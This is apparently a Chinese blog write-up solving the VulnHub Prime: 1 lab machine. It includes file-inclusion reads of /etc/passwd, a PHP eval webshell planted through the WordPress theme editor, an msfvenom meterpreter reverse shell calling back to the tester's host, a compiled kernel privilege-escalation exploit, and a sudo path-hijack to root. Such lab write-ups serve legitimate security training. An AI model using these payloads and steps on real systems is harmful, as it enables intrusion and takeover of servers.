vulnhub-prime_series_level_1渗透测试

环境搭建

官网https://www.vulnhub.com/entry/prime-1,358/
将VMX文件(VMWare 文件格式详解 .VMX .VMSD .VMDK)直接拖进来

在这里插入图片描述

思路

扫描网站路径与敏感文件,通过不断的提示找到一个可用的fuzz工具。利用fuzzing爆破参数发现了可利用进行文件包含的参数file,这里再得到提示后,在仅有的一个php文件中利用secrettier360参数fuzzing系统敏感文件,找到一个密码后在wordpress页面进行登录,找到一个可以写入内容的页面,写入一句话木马并getshell,最后利用已存在的一个漏洞或是利用后门密码进行提权

渗透测试

sudo arp-scan -l 
nmap -sV 192.168.22.130

在这里插入图片描述
访问80端口,没有任何信息
在这里插入图片描述
拿dirsearch直接扫

./dirsearch.py -u 192.168.22.130 -e*

在这里插入图片描述
访问dev目录,有提示但是又好像没有什么用
在这里插入图片描述
中间的几个页面访问到都没有什么用,再访问/wordpress/,一个新建的wordpress页面
在这里插入图片描述

再拿御剑扫一扫,发现了一个secret.txt,访问又发现一个提示
在这里插入图片描述

在这里插入图片描述
Fuzz_For_Web

看来是得用给出的工具去搞location.txt,这个工具简单来说就是用爆破的方式来模糊测试?后参数是什么,这里具体如何使用网址中也讲的很详细

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 http://192.168.22.130/index.php?FUZZ=location.txt

这里–hl 7就是对Lines进行的限制,因为发现有一个8L的数据,所以将大量7l的限制后,就能得到特殊的一个参数file

在这里插入图片描述
在这里插入图片描述

直接访问/index.php?file=location.txt
在这里插入图片描述

use ‘secrettier360’ parameter on some other php page for more fun.

刚才只扫到一个index.php和一个image.php所以这里只能利用image.php

在这里插入图片描述

这里尝试进行任意文件读取

/image.php?secrettier360=/etc/passwd

在这里插入图片描述

在/etc/passwd中发现find password.txt file in my directory:/home/saket,访问

/image.php?secrettier360=/home/saket/password.txt

在这里插入图片描述

得到一个密码(follow_the_ippsec),本想着在虚拟机上直接登录
在这里插入图片描述
在这里插入图片描述

又想起来刚刚有找到一个/wordpress/目录,既然是wordpress框架的话,尝试能不能直接找到它登陆的地方,这里也是有一个用户名
在这里插入图片描述

victor,follow_the_ippsec登录成功,这里找到theme editor的secret.php页面,发现可以进行文件上传,这里直接传一个php一句话木马

<?php @eval($_POST['qwer']);?>

在这里插入图片描述

搞过wordpress的应该可以找到上传路径在哪,不过这里能进行命令执行,但是不能用蚁剑进行连接

http://192.168.22.130/wordpress/wp-content/themes/twentynineteen/secret.php

在这里插入图片描述

利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.22.128 lport=1234 -f raw -o /home/yster/桌面/shell.php
      -p选择相应payload
      lhost=本地IP
      lport=监听端口
      -f raw 指定输出格式。
      -o 指定输出文件的位置

在这里插入图片描述
在这里插入图片描述

将secret.php文件上传成功后,使用msf模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。

msfconsole
use exploit/multi/handler
show options
set lhost 192.168.22.128
set payload php/meterpreter/reverse_tcp
set lport 1234
run
http://192.168.22.130/wordpress/wp-content/themes/twentynineteen/secret.php

在这里插入图片描述

通过会话拿到shell,再用python稳一下bash,这里已经拿到普通用户的权限了,接下来就是提权

python -c 'import pty;pty.spawn("/bin/bash")'
msf直接进行提权(失败)

参考渗透测试实战——prime靶机入侵时,是通过查看版本内核后发现可以利用msf直接拿下,但我在利用时候最后一步出了点问题
在这里插入图片描述
再打开kali的msf,利用LinuxKernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local PrivilegeEscalation进行提权
在这里插入图片描述

先把45010.c丢到一个好找的地方,对它进行编译,随后在meterpreter中进行上传,最后拿用户权限进行执行

 cp /usr/share/exploitdb/exploits/linux/local/45010.c  /home/yster/
 gcc 45010.c -o root
 
 upload /home/yster/root /tmp

 ./root

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

利用可任意调用文件的可执行文件

【writeup】Prime_Series_level_1靶机。查了好多文章,仿佛只有这一篇有写如何提权

在/opt下有一个backup_pass文件,存有enc文件密码(backup_password"),在home目录下查找enc文件
在这里插入图片描述
在这里插入图片描述
直接执行时需要密码,输入backup_password
在这里插入图片描述
看提示应该是从/root复制文件到当前路径。所以使用sudo执行。
在这里插入图片描述
但是好像并没有什么东西,cat一下enc与key
在这里插入图片描述enc.txt文件是一窜加密的文本。key.txt内容是提示如何解密enc.txt的加密文本(应该是先把ippsec进行md5加密,加密后的值用于解密enc.txt)。这里用到的网站:
https://www.cmd5.com/
https://www.devglan.com/online-tools/aes-encryption-decryption
https://base64.us/
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ipsec md5加密后的值为:366a74cb3c959de17d61db30591c39d1
enc解密后内容:Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,

根据解密后的内容,获得了saket密码。从www-data用户切换到saket用户。
切换到saket用户后,查看下saket用户的权限。

su saket   //tribute_to_ippsec
sudo -l

在这里插入图片描述
可以看到saket用户可以不输入密码执行/home/victor/undefeated_victor(这个跟sudoers文件有关),直接执行

sudo /home/victor/undefeated_victor

if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found

/tmp/challenge: not found,这里因为saket用户可以不输入密码执行/home/victor/undefeated_victor文件,而undefeated_victor文件会执行/tmp/challenge下的命令,因为该路径是空的所以会报错not found,但是/tmp是可写入的,所以将/bin/bash复制到/tmp/challenge,然后再次执行,就能获取root权限,整体就是saket用户->undefeated_victor->/tmp/challenge->/bin/bash

cp /bin/bash /tmp/challenge
sudo /home/victor/undefeated_victor

if you can defeat me then challenge me in front of you

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值